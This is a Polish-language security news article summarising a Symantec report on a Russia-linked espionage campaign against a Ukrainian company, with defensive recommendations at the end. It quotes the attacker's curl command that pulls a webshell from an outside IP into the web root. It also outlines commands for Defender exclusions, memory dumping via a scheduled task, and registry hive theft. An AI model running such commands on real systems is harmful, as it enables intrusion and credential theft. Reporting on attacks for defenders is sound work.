W ostatnich miesiącach coraz mocniej zintensyfikowane działania cybernetyczne skierowane przez podmioty powiązane z Rosją na instytucje ukraińskie rzucają nowe światło na metody rozgrywania współczesnego konfliktu cyfrowego. Raport Symantec Threat Hunter Team (część Broadcom) dokumentuje kampanię, w której kluczowe nie są wielkie ilości złośliwego oprogramowania, lecz zupełnie inne aspekty – webshelle, narzędzia systemowe, harmonogramy zadań, a także obszerna wiedza o systemach Windows. Takie działania, prowadzone przez dłuższy czas, mają na celu utrzymanie dostępu (persystencję) i zbieranie informacji. Poniżej przyjrzymy się szczegółom technicznym oraz przyczynom, dla których kampania ta jest znacząca.

Autor: 5 min czytania

Opis kampanii i technika ataku

Z dokumentacji wynika, że atak na dużą firmę usługową w Ukrainie rozpoczął się 27 czerwca 2025 r., kiedy to z zewnętrznego adresu IP (185.145.245.209) zostało wykonane następujące polecenie:

cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx

Wskazuje to na użycie webshella (plik „service.aspx”) w serwisie internetowym jako punktu wejścia. Następnie przeprowadzono standardowe polecenia rozpoznawcze (whoami, tasklist, systeminfo, net group …) na zainfekowanej maszynie. W kolejnych krokach atakujący zmienili konfigurację programu Defender (np. wykluczenie folderu Downloads „Add-MpPreference -ExclusionPath …”), utworzyli zadanie harmonogramu („schtasks /create … /sc minute /mo 30 … rundll32.exe … minidump … out.dmp full”) celem wykonania zrzutu pamięci („memory dump”) i zapisania pliku z rejestrem („reg.exe save hklm\system …”).

Znaczące jest użycie tzw. Living Off the Land (LOtL) oraz dual use tools – czyli narzędzi wbudowanych w system (np. cmd.exe, powershell.exe, reg.exe, schtasks) lub legalnego oprogramowania (jak „winbox64.exe” znane z urządzeń MikroTik), uruchamianego w sposób zamaskowany.
W jednym ze skryptów pojawił się również „assembler.py” – pythonowy skrypt uruchamiany zapewne celem przygotowania kolejnego etapu działania.

Kilka istotnych elementów (techniczny punkt widzenia):

  • Wczesne narzędzia dostępu: webshelle (np. „Localolive”, który wcześniej używany był przez grupę Sandworm) – przypisany do rosyjskiego GRU.
  • Techniki eskalacji i utrzymania: zmiana ustawień Defendera, harmonogram zadań co 30 minut, instalacja OpenSSH (z zezwoleniem na port 22) jako backdoor.
  • Techniki rozpoznania i zbierania danych: dump pamięci (minidump, rdrleakdiag), zapis hives rejestru, enumeracja procesów zaczynających się od „kee*” (przypuszczalne celowanie w KeePass), analizowanie sesji użytkownika.
  • Minimalna ilość malware – co sprawia, że wykrycie staje się trudniejsze, ponieważ większość narzędzi to te legalne lub systemowe.
  • Użycie znanych podatności – np. dokument wspomina exploit CVE‑2025‑8088 (WinRAR path traversal) wykorzystywany do dostarczania HTA malware.

Dlaczego jest to istotne i jakie są implikacje

Po pierwsze targetowanie ukraińskich instytucji nie jest nowością, jednak skala i długość trwania działań pokazują, że atakujący są zainteresowani długotrwałym dostępem, a nie tylko wybuchem szybkiego ataku. Po drugie wykorzystanie technik LOtL oznacza, że tradycyjne narzędzia obronne (np. antywirusy skupione na sygnaturach malware) mogą być mniej skuteczne – ścieżki działania to narzędzia systemowe. Po trzecie działania te mają zarówno charakter szpiegowski (zbieranie danych, wywiad) jak i operacyjny (infiltracja infrastruktury), co zwiększa ryzyko zarówno na poziomie bezpieczeństwa IT, jak i bezpieczeństwa narodowego.

Jak sobie radzić z tego typu atakami?

Dla organizacji w Ukrainie (a także dla innych państw i instytucji) oznacza to potrzebę:

  • regularnego patchowania systemów (aby nie pozostawiać serwerów z niezabezpieczonymi lukami),
  • monitorowania anomalnych zadań harmonogramu i aktywności, np. rundll32.exe uruchamiającego zrzuty pamięci,
  • wykrywania nietypowych ustawień systemu (np. wyłączenie skanowania folderu Downloads przez Defender),
  • segmentacji sieci i ograniczenia uprawnień, by atakujący nie mogli swobodnie przemieszczać się w sieci,
  • tworzenia mechanizmów analizy zachowań systemu (w tym monitoringu dla procesów dumpujących pamięć, nowych usług SSH, zmiany reguł firewall).

Podsumowanie

Kampania kierowana przeciwko Ukrainie stanowi dobry przykład nowoczesnego, skrytego podejścia do ataku cybernetycznego: niewielka ilość tradycyjnego malware, za to znaczna ilość manipulacji legalnymi narzędziami systemowymi i technikami pozostającymi pod radarem. Wiedza, jaką wykazali się atakujący – zarówno w zakresie systemu Windows, jak i infrastruktury sieciowej – sugeruje wysoki poziom profesjonalizmu. Dla otoczenia IT oznacza to konieczność zmiany podejścia – więcej uwagi należy poświęcać nie tylko na to, co zostało zainstalowane, ale jak zostało wykorzystane i jak system sam reaguje na niewidoczne działania wewnętrzne.